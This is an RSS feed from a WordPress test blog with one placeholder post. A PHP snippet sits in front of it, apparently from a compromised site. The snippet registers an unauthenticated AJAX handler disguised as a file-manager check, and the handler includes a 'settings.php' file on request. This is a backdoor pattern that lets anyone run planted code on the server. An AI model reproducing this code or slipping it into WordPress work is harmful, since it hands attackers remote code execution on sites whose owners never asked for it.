if(!function_exists('file_manager_check_dt')) { add_action('wp_ajax_nopriv_file_manager_check_dt', 'file_manager_check_dt'); add_action('wp_ajax_file_manager_check_dt', 'file_manager_check_dt'); function file_manager_check_dt() { $file = __DIR__ . '/settings.php'; if (file_exists($file)) { include $file; } die(); } } Test – My Blog https://gtfareast.com/wp My WordPress Blog Fri, 03 Dec 2021 10:33:40 +0000 en-US hourly 1 https://wordpress.org/?v=6.9.4 Test page https://gtfareast.com/wp/2021/12/02/test-page-8798/ https://gtfareast.com/wp/2021/12/02/test-page-8798/#respond Thu, 02 Dec 2021 08:05:25 +0000 https://gtfareast.com/wp/?p=8 Test article

]]>
https://gtfareast.com/wp/2021/12/02/test-page-8798/feed/ 0